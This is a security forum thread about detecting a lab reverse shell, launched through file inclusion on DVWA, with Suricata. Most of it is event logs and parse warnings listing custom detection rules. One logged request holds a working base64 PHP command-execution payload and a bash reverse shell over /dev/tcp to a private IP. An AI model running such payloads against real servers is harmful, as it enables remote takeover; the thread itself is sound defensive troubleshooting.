Reverse Shell detection

Hi,

I am trying to detect reverse shell with Suricata, but I do not get any alerts about it.
I am using DVWA (Damn Vulnerable Web Application) in my test environment and trying to test LFI with Reverse shell. When I am getting the shell from Web App server to my attacker machine, nothing is being reported.
I have DVWA configured both on HTTP and HTTPS, but for the sake of testing I am using only HTTP now.
In Suricata logs, Suricata assumes that it is legitiamet TLS traffic, cause I have set up my netcat listener on port 443. Log below:

{"timestamp":"2021-08-19T14:58:18.620513+0200","flow_id":2172483938159079,"in_iface":"ens33","event_type":"tls","src_ip":"192.168.184.132","src_port":58670,"dest_ip":"192.168.184.130","dest_port":443,"proto":"TCP","tls":{"sni":"ubuntu.tests.com","version":"TLS 1.3","ja3":{"hash":"a9ad47149f0ae19f6bbc8d0bf173e976","string":"771,4865-4866-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49160-49170-10-49155-49165-22-19-255,0-5-10-11-13-50-17-23-43-45-51,29-23-24-25-30-256-257-258-259-260,0"},"ja3s":{"hash":"f4febc55ea12b31ae17cfb7e614afda8","string":"771,4865,43-51"}}}

Could anyone guide me how to detect such attacks?
This is my list of enabled rules:

19/8/2021 -- 15:12:28 - <Info> -- Loading distribution rule file /etc/suricata/rules/app-layer-events.rules
19/8/2021 -- 15:12:28 - <Info> -- Loading distribution rule file /etc/suricata/rules/decoder-events.rules
19/8/2021 -- 15:12:28 - <Info> -- Loading distribution rule file /etc/suricata/rules/dhcp-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/dnp3-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/dns-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/files.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/http-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/ipsec-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/kerberos-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/modbus-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/nfs-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/ntp-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/smb-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/smtp-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/stream-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/tls-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Ignoring file rules/emerging-deleted.rules
19/8/2021 -- 15:12:33 - <Info> -- Loaded 30920 rules.

It seems that your are depending on the standard rules to detect that attack and I am not sure if it contains a rule to detect that.

Moreover, since the connection is over TLS, the detection opportunities will lay on IOCs, TLS traffic signatures (if any), and behavior detection.

The bottom line is, you probably will have to write your own rule or adapt one from the standard set.

But connection was not over TLS.
As I said, I just set up my netcat listener on port 443, but traffic was unencrypted.
So it is more puzzling for me, why Suricata thinks it is TLS?

indeed, this should not happen, it might be good to try to reproduce the situation and capture a pcap and pass it to the dev team to investigate.

Ok, I will reproduce it. Where should I send a pcap?

I think posting it here will be fine.

Pcap file right here:

reverse_shell_tls.pcap (2.8 KB)

Hi @IDSTower
Any news?

Hi, I replayed your pcap file in my test environment and 3 rules fired right away:
SID 2610004 - “SURICATA non-TLS on TLS port” - this is expected, your shell is not TLS but works on TLS port 443.
SID 3174423 “IDPS: base64 encoded PHP tags” - our custom rule, matched PD9waHAg part in your exploit. ( base64 encode of php tags). can get it here.
SID 2019285 “ET WEB_SERVER Possible bash shell piped to dev tcp Inbound to WebServer” matched “/dev/tcp/” part in your exploit.

None matched the reverse shell, it’s possible to create rule to match things like ‘cannot set terminal process grou’ or whatever is commonly used in shells, but those are trivial to bypass with obfuscation. It’s better to focus on prevention of popping shells in first place

Dear,
I inspected the provided pcap with Suricata 6.0.3 and no tls events were extracted, below are the events I got from the pcap you provided

{“timestamp”:“2021-08-23T12:57:37.672195+0400”,“flow_id”:1557968835400055,“event_type”:“flow”,“src_ip”:“192.168.184.130”,“src_port”:38496,“dest_ip”:“192.168.184.132”,“dest_port”:443,“proto”:“TCP”,“flow”:{“pkts_toserver”:10,“pkts_toclient”:9,“bytes_toserver”:981,“bytes_toclient”:605,“start”:“2021-08-23T12:57:37.872823+0400”,“end”:“2021-08-23T12:57:43.821094+0400”,“age”:6,“state”:“established”,“reason”:“shutdown”,“alerted”:false},“tcp”:{“tcp_flags”:“1a”,“tcp_flags_ts”:“1a”,“tcp_flags_tc”:“1a”,“syn”:true,“psh”:true,“ack”:true,“state”:“established”}}
{“timestamp”:“2021-08-23T12:57:37.672195+0400”,“flow_id”:1328785085514179,“event_type”:“http”,“src_ip”:“192.168.184.132”,“src_port”:42900,“dest_ip”:“192.168.184.130”,“dest_port”:80,“proto”:“TCP”,“tx_id”:0,“http”:{“hostname”:“wojtek-testy.emca.pl”,“url”:“/DVWA/vulnerabilities/fi/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=bash±c+"bash±i+>%26+/dev/tcp/192.168.184.132/443+0>%261"”,“http_user_agent”:“Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”,“http_method”:“GET”,“protocol”:“HTTP/1.1”,“length”:0}}
{“timestamp”:“2021-08-23T12:57:37.672195+0400”,“flow_id”:1328785085514179,“event_type”:“flow”,“src_ip”:“192.168.184.132”,“src_port”:42900,“dest_ip”:“192.168.184.130”,“dest_port”:80,“proto”:“TCP”,“app_proto”:“http”,“flow”:{“pkts_toserver”:3,“pkts_toclient”:2,“bytes_toserver”:776,“bytes_toclient”:140,“start”:“2021-08-23T12:57:37.672195+0400”,“end”:“2021-08-23T12:57:37.679583+0400”,“age”:0,“state”:“established”,“reason”:“shutdown”,“alerted”:false},“tcp”:{“tcp_flags”:“1a”,“tcp_flags_ts”:“1a”,“tcp_flags_tc”:“12”,“syn”:true,“psh”:true,“ack”:true,“state”:“established”}}

HI @Mark,
Thank you for your reply.
Can you tell me where I can get rule pattern for SID 2610004 ?
I do not have it in default rules provided with Suricata installation.

EDIT:

I tried to load idps.rules, but got warning, that Suricata failed to parse them:

root@ubuntu:/etc/suricata/rules# suricata-update --enable-conf idps.rules
26/8/2021 -- 12:26:31 - <Info> -- Using data-directory /var/lib/suricata.
26/8/2021 -- 12:26:31 - <Info> -- Using Suricata configuration /etc/suricata/suricata.yaml
26/8/2021 -- 12:26:31 - <Info> -- Using /etc/suricata/rules for Suricata provided rules.
26/8/2021 -- 12:26:31 - <Info> -- Found Suricata version 6.0.3 at /usr/bin/suricata.
26/8/2021 -- 12:26:31 - <Info> -- Loading idps.rules.
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"IDPS: WordPress login bruteforce - wp.getUsersBlogs in POST to /xmlrpc.php"; flow: established,to_server; content: "POST"; nocase; http_method; content: "/xmlrpc.php"; http_uri; nocase; fast_pattern; content: "wp.getUsersBlogs"; http_client_body; flowbits: set, IDPS_XMLRPC_BRUTE; sid:3000005; rev:1; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Possible path traversal detected in URI"; flow: to_server,established; priority: 2; flowbits: isnotset, IDPS_SYSTRAV; content: "|2e 2e 2f 2e 2e 2f|"; http_uri; sid:3000006; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET 80 (msg:"IDPS: Too many 404 replies detected"; flow: from_server,established; content: "404"; http_stat_code; detection_filter: track by_dst, count 5, seconds 60; sid:3000007; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: WordPress - wp-config.php requested."; flow: to_server,established; content: "GET"; http_method; nocase; content: "wp-config.php"; nocase; http_uri; sid:3000016; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: phpMyAdmin login request (GET)"; flow: established,to_server; content: "GET"; nocase; http_method; content: "pma_username"; http_uri; nocase; content: "pma_password"; http_uri; nocase; sid:3000020; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"IDPS: PLAIN WordPress Login Bruteforcing Detected"; flow: to_server,established; content: "POST"; http_method; content: "/wp-login.php"; nocase; http_uri; content: "log|3d|"; http_client_body; content: "pwd|3d|"; http_client_body; detection_filter: track by_src,count 5,seconds 60; sid:3000021; rev:1; classtype: web-application-attack; metadata: created_at 2020_03_05, updated_at 2020_03_05, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"IDPS: PLAIN Joomla Login Bruteforcing Detected"; flow: to_server,established; content: "POST"; http_method; content: "/index.php"; nocase; http_uri; content: "username|3d|"; http_client_body; content: "password|3d|"; http_client_body; detection_filter: track by_src,count 5,seconds 60; sid:3000022; rev:1; classtype: web-application-attack; metadata: created_at 2020_03_05, updated_at 2020_03_05, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"IDPS: PLAIN Drupal Login Bruteforcing Detected"; flow: to_server,established; content: "POST"; http_method; content: "/user/login"; nocase; http_uri; content: "name|3d|"; http_client_body; content: "pass|3d|"; http_client_body; detection_filter: track by_src,count 5,seconds 60; sid:3000023; rev:1; classtype: web-application-attack; metadata: created_at 2020_03_05, updated_at 2020_03_05, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"IDPS: PLAIN Joomla Login Bruteforcing Detected (/administrator/)"; flow: to_server,established; content: "POST"; http_method; content: "/administrator/"; nocase; http_uri; content: "username|3d|"; http_client_body; content: "passwd|3d|"; http_client_body; detection_filter: track by_src,count 5,seconds 60; sid:3000024; rev:1; classtype: web-application-attack; metadata: created_at 2020_03_05, updated_at 2020_03_05, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"IDPS: WordPress pingback - pingback.ping in POST to /xmlrpc.php"; flow: established,to_server; content: "POST"; nocase; http_method; content: "/xmlrpc.php"; http_uri; nocase; fast_pattern; content: "pingback.ping"; http_client_body; flowbits: set, IDPS_XMLRPC_BRUTE; sid:3000026; rev:1; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: .gzip file requested"; flow: established,to_server; content: "GET"; nocase; http_method; content: ".gzip"; http_uri; nocase; sid:3000027; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: WordPress login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/wp-login.php"; nocase; http_uri; content: "log|3d|"; http_client_body; content: "pwd|3d|"; http_client_body; flowbits: isnotset, IDPS_WP_LOGIN; flowbits: set, IDPS_WP_LOGIN; flowbits: noalert; sid:3000028; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: WordPress login failed"; flow: from_server,established; flowbits: isset, IDPS_WP_LOGIN; content: !"302"; http_stat_code; flowbits: unset, IDPS_WP_LOGIN; sid:3000029; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: WordPress login success"; flow: from_server,established; flowbits: isset, IDPS_WP_LOGIN; content: "302"; http_stat_code; content: "Set-Cookie|3a| wordpress_logged_in"; flowbits: unset, IDPS_WP_LOGIN; sid:3000030; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Joomla user login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/index.php"; nocase; http_uri; content: "option=com_users"; nocase; http_uri; content: "task=user.login"; nocase; http_uri; content: "username|3d|"; http_client_body; content: "password|3d|"; http_client_body; flowbits: isnotset, IDPS_JOOM_LOGIN; flowbits: set, IDPS_JOOM_LOGIN; flowbits: noalert; sid:3000031; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Joomla login attempt /administrator/ (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/administrator/"; nocase; http_uri; content: "Cookie|3a|"; content: "username|3d|"; http_client_body; content: "passwd|3d|"; http_client_body; flowbits: isnotset, IDPS_JOOM_ADMIN_LOGIN; flowbits: set, IDPS_JOOM_ADMIN_LOGIN; flowbits: noalert; sid:3000032; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Joomla user login failed"; flow: from_server,established; flowbits: isset, IDPS_JOOM_LOGIN; content: !"Set-Cookie|3a| joomla_user_state=logged_in"; flowbits: unset, IDPS_JOOM_LOGIN; sid:3000033; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Joomla user login success"; flow: from_server,established; flowbits: isset, IDPS_JOOM_LOGIN; content: "303"; http_stat_code; content: "Set-Cookie|3a| joomla_user_state=logged_in"; flowbits: unset, IDPS_JOOM_LOGIN; sid:3000034; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Drupal login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/user/login"; nocase; http_uri; content: "name|3d|"; http_client_body; content: "pass|3d|"; http_client_body; flowbits: isnotset, IDPS_DRUP_LOGIN; flowbits: set, IDPS_DRUP_LOGIN; flowbits: noalert; sid:3000035; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Drupal login failed"; flow: from_server,established; flowbits: isset, IDPS_DRUP_LOGIN; content: !"303"; http_stat_code; flowbits: unset, IDPS_DRUP_LOGIN; sid:3000036; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Drupal login success"; flow: from_server,established; flowbits: isset, IDPS_DRUP_LOGIN; content: "303"; http_stat_code; content: "Set-Cookie|3a| "; flowbits: unset, IDPS_DRUP_LOGIN; sid:3000037; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET 80 (msg:"IDPS: Too many 503 replies detected"; flow: from_server,established; content: "503"; http_stat_code; detection_filter: track by_dst, count 5, seconds 60; sid:3000057; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Joomla user login attempt /component/users/ (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/component/users/"; nocase; http_uri; content: "username|3d|"; http_client_body; content: "password|3d|"; http_client_body; flowbits: isnotset, IDPS_JOOM_LOGIN; flowbits: set, IDPS_JOOM_LOGIN; flowbits: noalert; sid:3000112; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Joomla admin login failed"; flow: from_server,established; flowbits: isset, IDPS_JOOM_ADMIN_LOGIN; content: "0"; http_stat_code; offset: 1; depth: 1; content: !"Set-Cookie|3a|"; flowbits: unset, IDPS_JOOM_ADMIN_LOGIN; sid:3000138; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Joomla admin login success"; flow: from_server,established; flowbits: isset, IDPS_JOOM_ADMIN_LOGIN; content: "303"; http_stat_code; content: "Set-Cookie|3a|"; flowbits: unset, IDPS_JOOM_ADMIN_LOGIN; sid:3000139; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Joomla user login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/index.php"; nocase; http_uri; content: "option|3d|com_users"; nocase; http_client_body; content: "task|3d|user.login"; nocase; http_client_body; content: "username|3d|"; http_client_body; content: "password|3d|"; http_client_body; flowbits: isnotset, IDPS_JOOM_LOGIN; flowbits: set, IDPS_JOOM_LOGIN; flowbits: noalert; sid:3000140; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Moodle login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/login/index.php"; nocase; http_uri; content: "username|3d|"; http_client_body; content: "password|3d|"; http_client_body; flowbits: isnotset, IDPS_MOODLE_LOGIN; flowbits: set, IDPS_MOODLE_LOGIN; flowbits: noalert; sid:3000141; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Moodle login failed"; flow: from_server,established; flowbits: isset, IDPS_MOODLE_LOGIN; content: !"Set-Cookie|3a| MOODLEID1|5f||3d|deleted"; flowbits: unset, IDPS_MOODLE_LOGIN; sid:3000142; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Moodle login success"; flow: from_server,established; flowbits: isset, IDPS_MOODLE_LOGIN; content: "303"; http_stat_code; content: "Set-Cookie|3a| MOODLEID1|5f||3d|deleted"; flowbits: unset, IDPS_MOODLE_LOGIN; sid:3000143; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: HTTP client body contains passwd="; flow: to_server,established; priority: 2; flowbits: isnotset, IDPS_JOOM_ADMIN_LOGIN; content: "passwd="; nocase; http_client_body; sid:3000144; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: HTTP client body contains password="; flow: to_server,established; priority: 2; flowbits: isnotset, IDPS_MOODLE_LOGIN; flowbits: isnotset, IDPS_JOOM_LOGIN; content: "password="; nocase; http_client_body; sid:3000145; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: archive file hunter .gz"; flow: to_server,established; content: ".gz"; nocase; isdataat: !1, relative; http_uri; content: !"|2f|sitemap"; nocase; http_uri; content: !"|3d|sitemap"; nocase; http_uri; flowbits: isnotset, IDPS_ARCHIVE_HUNTER; flowbits: set, IDPS_ARCHIVE_HUNTER; flowbits: noalert; sid:3000146; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: archive file hunter .rar"; flow: to_server,established; content: ".rar"; nocase; isdataat: !1, relative; http_uri; flowbits: isnotset, IDPS_ARCHIVE_HUNTER; flowbits: set, IDPS_ARCHIVE_HUNTER; flowbits: noalert; sid:3000147; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: archive file hunter .zip"; flow: to_server,established; content: ".zip"; nocase; isdataat: !1, relative; http_uri; flowbits: isnotset, IDPS_ARCHIVE_HUNTER; flowbits: set, IDPS_ARCHIVE_HUNTER; flowbits: noalert; sid:3000148; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: archive file hunter .7z"; flow: to_server,established; content: ".7z"; nocase; isdataat: !1, relative; http_uri; flowbits: isnotset, IDPS_ARCHIVE_HUNTER; flowbits: set, IDPS_ARCHIVE_HUNTER; flowbits: noalert; sid:3000149; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: archive file hunter .sql"; flow: to_server,established; content: ".sql"; nocase; isdataat: !1, relative; http_uri; flowbits: isnotset, IDPS_ARCHIVE_HUNTER; flowbits: set, IDPS_ARCHIVE_HUNTER; flowbits: noalert; sid:3000150; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: archive hunter file found"; flow: from_server,established; flowbits: isset, IDPS_ARCHIVE_HUNTER; content: "200"; http_stat_code; content: "Content-Type|3a| application"; flowbits: unset, IDPS_ARCHIVE_HUNTER; sid:3000151; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: archive hunter file not found"; flow: from_server,established; flowbits: isset, IDPS_ARCHIVE_HUNTER; content: !"20"; http_stat_code; offset: 0; depth: 2; flowbits: unset, IDPS_ARCHIVE_HUNTER; sid:3000152; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: suspicious request to wp-content"; flow: to_server,established; content: "/wp-content/themes/sketch/"; nocase; http_uri; content: ".php"; nocase; http_uri; sid:3000285; rev:1; classtype: web-application-attack; metadata: created_at 2020_07_16, updated_at 2020_07_16, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: PHP file in /wp-content/uploads/"; flow: to_server,established; content: "|2f|wp|2d|content|2f|uploads|2f|"; distance: 0; within: 20; nocase; http_uri; content: ".php"; nocase; isdataat: !1, relative; http_uri; sid:3000410; rev:1; classtype: web-application-attack; metadata: created_at 2020_07_30, updated_at 2020_07_30, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert ftp $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: PHP file upload over FTP"; flow: established,to_server; dsize: >10; content: "STOR"; depth: 4; content: ".php|0d 0a|"; distance: 0; pcre: "/^STOR\s+[^\r\n]+?\x2ephp\r?$/m"; sid:3000417; rev:1; classtype: web-application-attack; metadata: created_at 2020_07_30, updated_at 2020_07_30, affected_product Web_Server_Applications, attack_target Server; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert ftp $HOME_NET any -> $EXTERNAL_NET any (msg:"IDPS: FTP login failed"; flow: from_server,established; content: "530 "; depth: 4; pcre: "/^530\s+(Login|User)/smi"; sid:3000437; rev:1; classtype: web-application-attack; metadata: created_at 2020_07_31, updated_at 2020_07_31, affected_product Linux, attack_target Server; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Possible path traversal detected in URI v2"; flow: to_server,established; priority: 2; flowbits: isnotset, IDPS_SYSTRAV; content: "..%2F..%2F..%2F"; http_raw_uri; sid:3000438; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: system file requested in traversal (encoded)"; flow: to_server,established; content: "..%2F..%2F"; http_raw_uri; pcre: "/etc\/shadow|win\.ini|boot\.ini/Ui"; flowbits: isnotset, IDPS_SYSTRAV; flowbits: set, IDPS_SYSTRAV; sid:3000459; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: PHP file requested"; flow: to_server,established; content: ".php"; nocase; http_uri; content: !"index.php"; nocase; http_uri; flowbits: isnotset, IDPS_PHP_RECON; flowbits: set, IDPS_PHP_RECON; flowbits: noalert; sid:3173967; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_08, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: PHP file not found"; flow: from_server,established; flowbits: isset, IDPS_PHP_RECON; content: !"20"; http_stat_code; offset: 0; depth: 2; content: !"30"; http_stat_code; offset: 0; depth: 2; content: !"400"; http_stat_code; offset: 0; depth: 3; flowbits: unset, IDPS_PHP_RECON; sid:3173968; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_08, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
